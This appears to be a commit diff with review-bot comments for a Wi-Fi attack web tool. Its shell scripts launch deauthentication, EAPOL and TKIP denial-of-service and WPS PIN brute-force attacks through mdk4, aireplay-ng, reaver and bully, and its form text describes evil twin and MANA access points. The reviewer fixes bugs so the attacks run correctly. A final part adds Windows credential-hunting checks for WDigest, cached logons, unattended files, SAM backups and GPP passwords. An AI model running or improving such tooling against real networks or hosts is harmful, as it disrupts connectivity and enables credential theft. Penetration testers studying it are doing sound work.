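+elif [ "$OPTION" == "EAPOL_DoS" ]; then
+EAPOL_DoS
+elif [ "$OPTION" == "WIDS_confusion" ]; then
+WIDS_confusion
+fi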
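Review bot: Every function runs the assembled command as an unquoted `$CMD`, so any value containing whitespace — an ESSID with a space, which the web form in this commit wraps in double quotes when it builds the call — is word-split into separate arguments before `mdk4`/`aireplay-ng` see it, and `deauth_aireplay` additionally echoes it unquoted unlike its siblings. Building the command as a bash array and executing `"${CMD[@]}"` keeps each value as exactly one argument; `deauth_mdk4` rewritten that way is shown below, and the other six functions follow the same pattern. The temp files in `deauth_mdk4` and `fake_aps` use predictable `/tmp/victim$RANDOM`-style names instead of `mktemp` and are never removed once the tool exits.
```shell
deauth_mdk4(){
    # … unchanged: REQUREMENTS / Working mode comments …
    CMD=(mdk4 "$INTERFACE" d)
    if [ "$ESSID" ]; then
        CMD+=(-E "$ESSID")
    fi
    if [ "$BSSID" ]; then
        CMD+=(-B "$BSSID")
    fi
    if [ "$MAC_CLIENT" ]; then
        TEMPFILE="$(mktemp /tmp/victim.XXXXXX)"
        echo "$MAC_CLIENT" > "$TEMPFILE"
        CMD+=(-b "$TEMPFILE")
    fi
    if [ "$CHANNEL" ]; then
        CMD+=(-c "$CHANNEL")
    fi
    if [ "$STEALTH" ]; then
        CMD+=(-x)
    fi
    if [ "$TIME" ]; then
        CMD=(timeout "$TIME" "${CMD[@]}")
    fi
    echo "Going to execute ${CMD[*]}"
    "${CMD[@]}"
}
# … unchanged: fake_aps, reinject_data, TKIP_DoS, EAPOL_DoS, WIDS_confusion and the OPTION dispatch …
```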

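--- /dev/null
+++ b/[path not shown on page]
@@ -0,0 +1,70 @@
+#!/bin/bash
+INTERFACE=""
+OPTION=""
+TOOL=""
+BSSID=""
+CHANNEL=""
+PIN=""
+IGNORE_LOCKS="1"
+while getopts "i:o:t:b:c:p:l" opt; do
+case "$opt" in
+i) INTERFACE=$OPTARG;;
+o) OPTION=$OPTARG;;
+t) TOOL=$OPTARG;;
+b) BSSID=$OPTARG;;
+c) CHANNEL=$OPTARG;;
+p) PIN=$OPTARG;;
+l) IGNORE_LOCKS="";;
+esac
+done
+wps_force(){
+# REQUREMENTS: INTERFACE, ESSID and AUTH
+if [ $TOOL = "reaver" ]; then
+CMD="reaver -i $INTERFACE -b $BSSID -c $CHANNEL"
+case $OPTION in
+"custompin")
+CMD="$CMD -f -N -g 1 -d 2 -vv -p '$PIN'"
+if [ "$IGNORE_LOCKS" ]; then CMD="$CMD -L"; fi
+;;
+"nullpin")
+CMD="$CMD -f -N -g 1 -d 2 -vv -p ''"
+if [ "$IGNORE_LOCKS" ]; then CMD="$CMD -L"; fi
+;;
+"pixiedust")
+CMD="$CMD -K 1 -Z -N -vv"
+;;
+"bruteforce")
+CMD="$CMD -f -N -vv"
+if [ "$IGNORE_LOCKS" ]; then CMD="$CMD -L -d 2"; fi
+;;
+esac
+elif [ $TOOL = "bully" ]; then
+CMD="bully $INTERFACE -b $BSSID -c $CHANNEL"
+case $OPTION in
+"custompin")
+CMD="$CMD -F -B -v 3 -p '$PIN'"
+if [ "$IGNORE_LOCKS" ]; then CMD="$CMD -L"; fi
+;;
+"pixiedust")
+CMD="$CMD -d -v 3"
+;;
+"bruteforce_wps")
+CMD="$CMD -S -F -B -v 3"
+if [ "$IGNORE_LOCKS" ]; then CMD="$CMD -L"; fi
+;;
+esac
+fi
+echo "Going to execute: echo \"n\" | $CMD"
+echo "n" | $CMD
+}
+wps_force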
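Review bot: The reaver branch matches `"bruteforce"` while the form in this commit submits `bruteforce_wps` (the bully branch already uses `"bruteforce_wps"`), so a reaver brute-force silently runs with no mode flags at all; the label should be `"bruteforce_wps")`. The single quotes in `-p '$PIN'` and `-p ''` are literal characters once `$CMD` is expanded unquoted, so reaver/bully receive a PIN wrapped in quote marks rather than the bare digits — `CMD="$CMD -f -N -g 1 -d 2 -vv -p $PIN"` (and likewise on the bully line) is what was intended, and the null-PIN case needs an explicit empty argument that a string-built command cannot express but a bash array can (`CMD+=(-p "")`, executed as `"${CMD[@]}"`). `[ $TOOL = "reaver" ]` with an unquoted `$TOOL` also produces a test error instead of falling through when `-t` is omitted; quote it as `[ "$TOOL" = "reaver" ]`. The REQUREMENTS comment names ESSID and AUTH, which this script never reads; it should list INTERFACE, BSSID, CHANNEL and OPTION.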



@ -0,0 +1,262 @@
file:///root/projects/wwjuggler/app/static/form_options.js {"mtime":1578310037779,"ctime":1578075190140,"size":9552,"etag":"34ebpirra9t4","orphaned":false}
$("#option").on("change", function(){
hide_fields()
});
function hide_fields() {
$('#option_msg').html(options_msgs[$("#option").val()]);
switch($("#option").val()) {
case "deauth_aireplay":
show_essid()
show_bssid()
show_client()
hide_fake_essids()
hide_stealth()
hide_channel()
break;
case "deauth_mdk4":
show_essid()
show_bssid()
show_client()
show_stealth()
show_channel()
hide_fake_essids()
break;
case "WIDS_confusion":
show_essid()
show_bssid()
show_stealth()
hide_client()
hide_fake_essids()
hide_channel()
break;
case "fake_aps":
show_channel()
show_stealth()
show_fake_essids()
hide_bssid()
hide_client()
hide_essid()
break;
case "reinject_data":
show_bssid()
show_stealth()
hide_essid()
hide_channel()
hide_client()
hide_fake_essids()
break;
case "EAPOL_DoS":
show_bssid()
show_stealth()
hide_essid()
hide_channel()
hide_client()
hide_fake_essids()
break;
case "TKIP_DoS":
show_bssid()
show_stealth()
hide_essid()
hide_channel()
hide_client()
hide_fake_essids()
break;
case "evil_twin":
hide_known_beacons()
hide_mac_whitelist()
hide_mac_blacklist()
hide_essid_whitelist()
hide_essid_blacklist()
hide_loud()
show_essid()
show_bssid()
show_channel()
break;
case "mana":
show_known_beacons()
show_mac_whitelist()
show_mac_blacklist()
show_essid_whitelist()
show_essid_blacklist()
show_loud()
hide_essid()
hide_bssid()
break;
default:
show_essid()
show_bssid()
show_client()
show_fake_essids()
show_stealth()
show_channel()
show_known_beacons()
show_mac_whitelist()
show_mac_blacklist()
show_essid_whitelist()
show_essid_blacklist()
show_loud()
break;
}
}
function hide_essid(){
$("#essid1").hide()
$("label[for='essid1']").hide()
$("#essid2").hide()
$("label[for='essid2']").hide()
}
function show_essid(){
$("#essid1").show()
$("label[for='essid1']").show()
$("#essid2").show()
$("label[for='essid2']").show()
}
function hide_bssid(){
$("#bssid").hide()
$("label[for='bssid']").hide()
$("#bssid1").hide()
$("label[for='bssid1']").hide()
$("#bssid2").hide()
$("label[for='bssid2']").hide()
}
function show_bssid(){
$("#bssid1").show()
$("label[for='bssid1']").show()
$("#bssid2").show()
$("label[for='bssid2']").show()
$("#bssid").show()
$("label[for='bssid']").show()
}
function hide_client(){
$("#client1").hide()
$("label[for='client1']").hide()
$("#client2").hide()
$("label[for='client2']").hide()
}
function show_client(){
$("#client1").show()
$("label[for='client1']").show()
$("#client2").show()
$("label[for='client2']").show()
}
function hide_channel(){
$("#channel").hide()
$("label[for='channel']").hide()
}
function show_channel(){
$("#channel").show()
$("label[for='channel']").show()
}
function show_fake_essids(){
$("#fake_essids").show()
$("label[for='fake_essids']").show()
}
function hide_fake_essids(){
$("#fake_essids").hide()
$("label[for='fake_essids']").hide()
}
function show_stealth(){
$("#stealth").show()
}
function hide_stealth(){
$("#stealth").hide()
}
function show_loud(){
$("#loud").show()
}
function hide_loud(){
$("#loud").hide()
}
function hide_known_beacons(){
$("#known_beacons").hide()
$("label[for='known_beacons']").hide()
}
function show_known_beacons(){
$("#known_beacons").show()
$("label[for='known_beacons']").show()
}
function hide_mac_whitelist(){
$("#mac_whitelist").hide()
$("label[for='mac_whitelist']").hide()
}
function show_mac_whitelist(){
$("#mac_whitelist").show()
$("label[for='mac_whitelist']").show()
}
function hide_mac_blacklist(){
$("#mac_blacklist").hide()
$("label[for='mac_blacklist']").hide()
}
function show_mac_blacklist(){
$("#mac_blacklist").show()
$("label[for='mac_blacklist']").show()
}
function hide_essid_whitelist(){
$("#essid_whitelist").hide()
$("label[for='essid_whitelist']").hide()
}
function show_essid_whitelist(){
$("#essid_whitelist").show()
$("label[for='essid_whitelist']").show()
}
function hide_essid_blacklist(){
$("#essid_blacklist").hide()
$("label[for='essid_blacklist']").hide()
}
function show_essid_blacklist(){
$("#essid_blacklist").show()
$("label[for='essid_blacklist']").show()
}
var options_msgs = {
"deauth_aireplay": "Deauthenticate a single client (sending a packet specifically for the client), clients inside an AP or clients of a ESSID (sending broadcast deuthentication packets). More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#deauthentication-packets'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#deauthentication-packets </a>",
"deauth_mdk4": "Deauthenticate a single client, clients inside an AP or clients of a ESSID by discovering clients connected and sending deauthentication/disassociation packets to them. Stealth mode make match all Sequence Numbersand not send broadcast deauthentication packets. More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#disassociation-packets'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#disassociation-packets </a>",
"WIDS_confusion": "Confuse/Abuse Intrusion Detection and Prevention Systems by cross-connecting clients to multiple WDS nodes or fake rogue APs. If no stealth then it launch Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts). More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4 </a>",
"fake_aps": "Sends beacon frames to show fake APs at clients. This can sometimes crash network scanners and even drivers. If no stealth, then it uses also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit. More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4 </a>",
"reinject_data": "Sends authentication frames to all APs found in range. Too many clients can freeze or reset several APs. If stealth, then this test connects clients to the AP and reinjects sniffed data to keep them alive. More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4 </a>",
"EAPOL_DoS": "Floods an AP with EAPOL Start frames to keep it busy with fake sessions and thus disables it to handle any legitimate clients. Or logs off clients by injecting fake EAPOL Logoff messages. If stealth, use Logoff messages to kick clients. More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4 </a>",
"TKIP_DoS": "Sends random packets or re-injects duplicates on another QoS queue to provoke Michael Countermeasures on TKIP APs. AP will then shutdown for a whole minute, making this an effective DoS. If stealth, Use the new QoS exploit which only needs to reinject a few packets instead of the random packet injection, which is unreliable but works without QoS. More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4 </a>",
"evil_twin": "Create a fake access point. You decide the authentication method, the name and the BSSID. More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#evil-twin'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#evil-twin </a>",
"mana": "Find the PNL of the devices and create fake APs with that ESSIDS. Select the authentication method. More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#karma-mana-loud-mana-and-known-beacons-attack'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#karma-mana-loud-mana-and-known-beacons-attack </a>",
"airodump": "Capture handshakes in the indicated channel using airodump-ng.",
"nullpin": "Some really bad implementations allowed the Null PIN to connect (very weird also). Reaver can test this (Bully cannot).",
"pixiedust": "Try to find if the randomization is weak"
}
window.onload = hide_fields


@ -0,0 +1,50 @@
{% extends 'bootstrap/base.html' %}
{% block title %}
{% if title %}{{ title }} - WWJuggler{% else %}Welcome to WWJuggler{% endif %}
{% endblock %}
{% block styles %}
<link rel="stylesheet" href="{{url_for('static', filename='bootstrap.min.css')}}">
{% endblock %}
{% block navbar %}
<script type=text/javascript src="{{ url_for('static', filename='jquery.js') }}"></script>
<nav class="navbar navbar-default">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="{{ url_for('index') }}">WWJuggler</a>
</div>
<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
<ul class="nav navbar-nav">
<li><a href="{{ url_for('console') }}">Console</a></li>
<li><a href="{{ url_for('dos') }}">DoS</a></li>
<li><a href="{{ url_for('client') }}">Twin/MANA</a></li>
<li><a href="{{ url_for('create_cert') }}">EAP Cert</a></li>
<li><a href="{{ url_for('wps_cracking') }}">WPS</a></li>
<li><a href="{{ url_for('capture_handshake') }}">Cap-HShakes</a></li>
<li><a href="{{ url_for('execute') }}">Exec</a></li>
</div>
</div>
</nav>
{% endblock %}
{% block content %}
<div class="container">
{% with messages = get_flashed_messages() %}
{% if messages %}
{% for message in messages %}
<div class="alert alert-info" role="alert">{{ message }}</div>
{% endfor %}
{% endif %}
{% endwith %}
{# application content needs to be provided in the app_content block #}
{% block app_content %}{% endblock %}
</div>
{% endblock %}
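Review bot: The `<ul class="nav navbar-nav">` opened at L1005 is never closed — the `</div>` at L1013 closes the collapse wrapper while the list is still open, so browsers have to auto-close it and the navbar markup Bootstrap expects is not what gets parsed. Add `</ul>` right after the last item: `<li><a href="{{ url_for('execute') }}">Exec</a></li>` followed by `</ul>`. The flashed messages at L1022 are rendered as `{{ message }}`, which keeps Jinja autoescaping in effect; whatever the views flash (including any tool output) is therefore shown as text, so this should never be changed to `{{ message|safe }}`.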


@ -0,0 +1,17 @@
{% extends "base.html" %}
{% block app_content %}
{% if not procs %}
<h2> Nothing is being executed yet.</h2>
{% else %}
<h2>Current Processes <a href="/killall" style="color:red;">[Kill All]</a></h2>
{% for p in procs %}
<pre style="border: 1px solid; margin: 10px; padding-left:3px; {% if p.terminated == 'Stopped' %} color:green; {% endif %}" >
<h4>{{p.name}} {% if p.terminated == 'Running' %} <a href="/kill/{{p.name}}" style="color:red;">[Kill]</a> {% endif %} ({{p.terminated}})</h4>
{{p.tail}}
</pre>
{% endfor %}
<script>setTimeout(function(){window.location.reload(1);}, 5000);</script>
{% endif %}
{% endblock %}
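Review bot: The kill links at L1039 and L1042 hard-code `/killall` and `/kill/{{p.name}}` while the other templates in this commit build links with `url_for`, and interpolating `p.name` straight into a path only HTML-escapes it, it is not URL-encoded, so a name containing `?`, `#` or `%` would change which route is hit. Prefer `<a href="{{ url_for('kill', name=p.name) }}" style="color:red;">[Kill]</a>` (substituting whatever endpoint name the kill view actually has; the view is not in this section). These are also plain GET links that terminate processes; behind HTTP Basic auth the browser resends credentials on its own, so a GET with side effects can be fired from any other page the operator's browser loads, and a small POST form would be the safer shape.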


@ -0,0 +1,19 @@
{% extends "base.html" %}
{% import 'bootstrap/wtf.html' as wtf %}
{% block app_content %}
<h1>{{ formtype }}</h1>
<div class="alert alert-secondary" role="alert"><h4>Information about the attack</h4><p id="option_msg"></p></div>
<p><i>Notice that ESSID2, BSSID2 and Client2 have priority over ESSID1, BSSID1 and Client1</i></p>
<div class="row">
<div class="col-md-4">
{{ wtf.quick_form(form) }}
</div>
</div>
<br>
{% endblock %}
{% block scripts %}
<script type=text/javascript src="{{ url_for('static', filename='form.js') }}"></script>
{% endblock %}


@ -0,0 +1,26 @@
{% extends "base.html" %}
{% block app_content %}
<div style="margin:20px">
<h3> Available wlan interfaces</h3>
<ul>
{% for wlan, mode in wlans.items() %}
{% if mode == "Managed" %}
<li><h5 style="color:green; font-size:15px">{{ wlan }} ({{ mode }}) <button onclick="window.location.href = '/change_wlan_mode/{{ wlan }}';">Change Mode</button> </h5></li>
{% else %}
<li><h5 style="color:red; font-size:15px">{{ wlan }} ({{ mode }}) <button onclick="window.location.href = '/change_wlan_mode/{{ wlan }}';">Change Mode</button></h5></li>
{% endif %}
{% endfor %}
</ul>
<br>
<form action="/restart_airodump">
<input type="submit" value="Restart airodump" />
</form>
<!--<br>
<form action="/reboot" method="POST" onsubmit="return confirm('Do you really want to reboot the system?');">
<input type="submit"style="color:red;" value="Reboot System" />
</form>
<br>-->
</div>
<iframe src="/scan_results" style="position:fixed; left:0px; right:0px; width:100%; height:75%; border:none; margin:0;"></iframe>
{% endblock %}
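Review bot: "Change Mode" (L1080/L1082) and "Restart airodump" (L1087) change device state — flipping an interface into monitor mode, killing and restarting the capture — over plain GET requests, and the commented-out reboot form at L1091 already shows the better pattern (`method="POST"` plus a confirm). With HTTP Basic auth the browser attaches credentials automatically, so a GET with side effects is reachable from any page the operator happens to open (an `<img src="/restart_airodump">` is enough). Turning both into small POST forms, e.g. `<form action="{{ url_for('change_wlan_mode', wiface=wlan) }}" method="POST"><button>Change Mode</button></form>` (assuming that is the view's endpoint name; the view is not in this section), and accepting only POST in the views closes that. Building the URL with `url_for` instead of the inline `'/change_wlan_mode/{{ wlan }}'` string inside `onclick` also stops relying on the interface name being free of quote characters.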


@ -0,0 +1,41 @@
{% block content %}
{% if aps|length > 0 %}
<h2>Current APs</h2>
<table>
<tr>
{% for key, value in aps[0].items() %}
<th>{{key}}</th>
{% endfor %}
</tr>
{% for ap in aps %}
<tr>
{% for key, value in ap.items() %}
<th>{{value}}</th>
{% endfor %}
</tr>
{% endfor %}
</table>
<h2>Current Clients</h2>
<table>
<tr>
{% for key, value in clients[0].items() %}
<th>{{key}}</th>
{% endfor %}
</tr>
{% for client in clients %}
<tr>
{% for key, value in client.items() %}
<th>{{value}}</th>
{% endfor %}
</tr>
{% endfor %}
</table>
{% else %}
<h1>Nothing was found (is airodump-ng running?)</h1>
{% endif %}
{% endblock %}
<script>setTimeout(function(){window.location.reload(1);}, 20000);</script>
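Review bot: When APs have been seen but no client yet, `clients[0].items()` at L1122 runs against an empty list — with Flask's default Jinja `Undefined`, `clients[0]` becomes undefined and `.items()` on it raises, so the whole scan page errors until the first client shows up; wrap the second table in `{% if clients %} … {% endif %}` (and `{% if aps %}` reads better than `aps|length > 0` at L1103). The value cells at L1114 and L1129 use `<th>` where `<td>` is meant. Keep the cells as plain `{{value}}`: ESSIDs and probed ESSIDs are broadcast by arbitrary nearby devices, so they are attacker-controlled strings, and autoescaping is the only thing stopping a crafted SSID from injecting markup into the operator's browser — never add `|safe` here.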


@ -0,0 +1,177 @@
from subprocess import Popen, PIPE
from time import sleep
import os, signal, glob, datetime
count_ps = 0
executing_procs = {}
wlans_being_used = []
main_iface = ""
current_path = os.path.dirname(os.path.abspath(__file__))
scripts_path = current_path + "/scripts/"
executing_path = current_path + "/executing/"
store_path = os.path.expanduser("~/.wwjuggler/")
current_store_path = store_path + datetime.datetime.now().strftime("%d-%m-%Y_%H:%M")
store_airodump = current_store_path + "/airodump_scan"
#############################
### Wlan ifaces functions ###
#############################
def get_wlan_interfaces():
global main_iface
wlans = {}
up_wlans_interfaces()
procs = get_procs()
for w in os.popen('ip link show | grep -oP "wlan[\da-zA-Z]*"').read().split():
wlans[w] = "Managed" if "Managed" in os.popen("iwconfig "+w+" | grep Mode").read() else "Monitor"
if w == main_iface:
wlans[w] = wlans[w] + "- Main in use"
continue
being_used = True if any( [ p["terminated"] == "Running" for p in procs if (w != main_iface and w in p["name"]) ] ) else False # True is a process using the interface is running
if being_used:
wlans[w] = wlans[w] + "- in use"
return wlans
def up_wlans_interfaces():
for iface in os.popen('ip link show | grep "DOWN" | grep -oP "wlan[\da-zA-Z]*"').read().split():
os.system("ifconfig "+iface+" up")
for iface in os.popen('ip link show | grep "DOWN" | grep -oP "wlan[\da-zA-Z]*"').read().split():
os.system("nmcli device set "+iface+" managed yes")
os.system("ifconfig "+iface+" up")
#############################
###### Clean functions ######
#############################
#def clean_exec_procs_dir():
# fileList = glob.glob(executing_path+'/*.out')
# fileList += glob.glob(executing_path+'/*.err')
# for filePath in fileList:
# try:
# os.remove(filePath)
# except:
# print("Error while deleting file : ", filePath)
def clean_data(data):
not_interesting = ["First time seen", "Last time seen", "Speed", "LAN IP", "ID-length"]
for ni in not_interesting:
data.pop(ni, None)
return data
#############################
## Wifi scanning functions ##
#############################
def get_scan_results():
if not os.path.isfile(store_airodump+'/wwjuggler-airo-01.csv'):
return ([],[])
with open(store_airodump+'/wwjuggler-airo-01.csv','r') as f:
csv_content = f.read().splitlines()
stations = []
stations_header = [val.lstrip() for val in csv_content[1].strip().split(",")]
clients = []
clients_header = []
actual = stations
actual_header = stations_header
is_client = False
for line in csv_content[2:]:
line = line.strip()
if ("Probed ESSIDs") in line:
actual = clients
clients_header = [val.lstrip() for val in line.split(",")]
actual_header = clients_header
is_client = True
continue
actual.append({})
if not is_client:
line_splitted = line.split(",")
else:
line_splitted = line.split(",")[:6]+[",".join(line.split(",")[6:])]
for i, value in enumerate(line_splitted):
actual[-1][actual_header[i]] = value.replace(" ","").lstrip()
actual[-1] = clean_data(actual[-1])
return (stations, clients)
def get_macs_aps_clients():
stations,clients = get_scan_results()
stations_macs = list(set([ b["BSSID"] for b in stations if b["BSSID"]]))
stations_macs.sort()
essids = list(set([ b["ESSID"] for b in stations if "ESSID" in b.keys() and b["ESSID"]]))
essids.sort()
clients_macs = list(set([ c["Station MAC"] for c in clients if c["Station MAC"]]))
clients_macs.sort()
stations_macs.insert(0,"")
essids.insert(0,"")
clients_macs.insert(0,"")
return stations_macs, essids, clients_macs
def restart_airo():
global main_iface
#Stop airodump
for pid in os.popen("pgrep -f '/wwjuggler-airo'").read().splitlines():
print("Kill airodump pid "+str(pid))
os.kill(int(pid), signal.SIGTERM)
#Delete previous airodumps
fileList = glob.glob(store_airodump+'/wwjuggler-airo*')
for filePath in fileList:
try:
os.remove(filePath)
except:
print("Error while deleting file : ", filePath)
#Start airodump
wlans = get_wlan_interfaces()
if len(wlans) > 0:
iface = list(wlans.keys())[0]
main_iface = iface
cmd = "airodump-ng --wps -w "+store_airodump+"/wwjuggler-airo --output-format csv --background 1 " + main_iface
print("Executing airodump: "+cmd)
Popen(cmd.split(" "))
sleep(5)
else:
print("NO WLAN INTERFACE DETECTED!!!")
#############################
#Process management functions
#############################
def get_procs():
global executing_procs
files_executing = list(filter(os.path.isfile, glob.glob(current_store_path + "/*")))
files_executing.sort(key=lambda x: os.path.getmtime(x))
files_executing.reverse()
procs = []
for f in files_executing:
f_err = f.replace(".out",".err")
if ".out" in f:
if int(os.path.getsize(f)) >= int(os.path.getsize(f_err)):
procs.append({"name": f.split("/")[-1], "terminated": "Stopped" if not (executing_procs[f.split("/")[-1]].poll() is None) else "Running", "tail": os.popen('tail -n 20 ' + f).read()})
else:
procs.append({"name": f_err.split("/")[-1], "terminated": "Stopped" if not (executing_procs[f.split("/")[-1]].poll() is None) else "Running", "tail": os.popen('tail -n 20 ' + f_err).read()})
return procs
#############################
###### Other functions ######
#############################
def my_execute(cmd, outfile, errfile, shell=False):
global executing_procs, count_ps
print("Executing: "+str(cmd))
with open(outfile, "wb") as out, open(errfile, "wb") as err:
proc = Popen(cmd, stdout=out, stderr=err, stdin=PIPE, shell=shell, preexec_fn=os.setsid)
executing_procs[outfile.split("/")[-1]] = proc
count_ps += 1
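Review bot: `get_scan_results` (L1210–L1225) splits every AP row on `,` and then indexes `actual_header[i]` for each piece, so an AP whose ESSID contains a comma yields more pieces than headers and raises IndexError — and because an SSID is chosen by whoever runs the AP, a single crafted beacon nearby breaks the scan page and every form that calls `get_macs_aps_clients`. The `.replace(" ","")` at L1224 also rewrites ESSIDs containing spaces (`Free WiFi` becomes `FreeWiFi`), so the value later offered as an attack target no longer matches the real network. Cap the split at the number of header columns (which is what the client branch at L1222 already does by hand), strip rather than delete whitespace, and skip the blank separator lines that currently produce the empty rows `get_macs_aps_clients` has to filter out. I cannot see the exact airodump column layout from here; if ESSID is not the last AP column, `csv.reader` would be the more faithful parser.

```python
    for line in csv_content[2:]:
        line = line.strip()
        if not line:
            continue
        if "Probed ESSIDs" in line:
            # … unchanged: switch to the client header …
            continue
        # Never produce more fields than headers: the trailing (ESSID) column may itself contain commas.
        line_splitted = line.split(",", len(actual_header) - 1)
        actual.append({actual_header[i]: value.strip() for i, value in enumerate(line_splitted)})
        actual[-1] = clean_data(actual[-1])
```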


@ -29,6 +29,10 @@ Some of the tests in this script were extracted from **[here](https://github.com
- [x] Audit Settings
- [x] WEF Settings
- [x] LAPS installed?
- [x] LSA protection?
- [x] Credential Guard?
- [x] WDigest?
- [x] Number of cached cred
- [x] UAC Settings
- [x] AV?
- [x] PS Settings
@ -50,7 +54,12 @@ Some of the tests in this script were extracted from **[here](https://github.com
- [x] Windows Vault
- [x] DPAPI Master Keys
- [x] AppCmd.exe?
- [x] Search for known registry to have passwords and keys inside
- [x] Check for unattended files
- [x] Check for SAM & SYSTEM backups
- [x] Check for cached GPP Passwords
- [x] Check for McAffe SiteList.xml files
- [x] Check for Cloud credentials
- [x] Search for known registry to have passwords and keys inside (Winlogon...)
- [x] Search for known files to have passwords inside (can take some minutes)
- [x] If *long*, search files with passwords inside
- [x] If *long*, search registry with passwords inside


@ -116,6 +116,26 @@ echo [i] Check what is being logged
REG QUERY "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled
echo.
echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] LSA protection? ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
echo [i] Active if "1"
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v RunAsPPL
echo.
echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Credential Guard? ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
echo [i] Active if "1" or "2"
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v LsaCfgFlags
echo.
echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] WDigest? ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
echo [i] Plain-text creds in memory if "1"
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential
echo.
echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Number of cached creds ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
echo [i] You need System to extract them
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v CACHEDLOGONSCOUNT
echo.
echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] UAC Settings ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
echo [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on
echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
@ -153,7 +173,8 @@ echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] INSTALLED SOFTWARE ^<_-_-_-_-_-_-_-_-_
echo [i] Some weird software? Check for vulnerabilities in unknow software installed
echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software
dir /b "C:\Program Files" "C:\Program Files (x86)" | sort
reg query HKEY_LOCAL_MACHINE\SOFTWARE
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr InstallLocation | findstr ":\\"
reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ /s | findstr InstallLocation | findstr ":\\"
IF exist C:\Windows\CCM\SCClient.exe echo SCCM is installed (installers are run with SYSTEM privileges, many are vulnerable to DLL Sideloading)
echo.
echo.
@ -370,6 +391,54 @@ echo Looking inside %localappdata%\Microsoft\Credentials\
dir /b/a %localappdata%\Microsoft\Credentials\ 2>nul
echo.
echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Unattended files ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
IF EXIST %WINDIR%\sysprep\sysprep.xml ECHO %WINDIR%\sysprep\sysprep.xml exists.
IF EXIST %WINDIR%\sysprep\sysprep.inf ECHO %WINDIR%\sysprep\sysprep.inf exists.
IF EXIST %WINDIR%\sysprep.inf ECHO %WINDIR%\sysprep.inf exists.
IF EXIST %WINDIR%\Panther\Unattended.xml ECHO %WINDIR%\Panther\Unattended.xml exists.
IF EXIST %WINDIR%\Panther\Unattend.xml ECHO %WINDIR%\Panther\Unattend.xml exists.
IF EXIST %WINDIR%\Panther\Unattend\Unattend.xml ECHO %WINDIR%\Panther\Unattend\Unattend.xml exists.
IF EXIST %WINDIR%\Panther\Unattend\Unattended.xml ECHO %WINDIR%\Panther\Unattend\Unattended.xml exists.
IF EXIST %WINDIR%\System32\Sysprep\unattend.xml ECHO %WINDIR%\System32\Sysprep\unattend.xml exists.
IF EXIST %WINDIR%\System32\Sysprep\unattended.xml ECHO %WINDIR%\System32\Sysprep\unattended.xml exists.
IF EXIST %WINDIR%\..\unattend.txt ECHO %WINDIR%\..\unattend.txt exists.
IF EXIST %WINDIR%\..\unattend.inf ECHO %WINDIR%\..\unattend.inf exists.
echo.
echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] SAM & SYSTEM backups ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
IF EXIST %WINDIR%\repair\SAM ECHO %WINDIR%\repair\SAM exists.
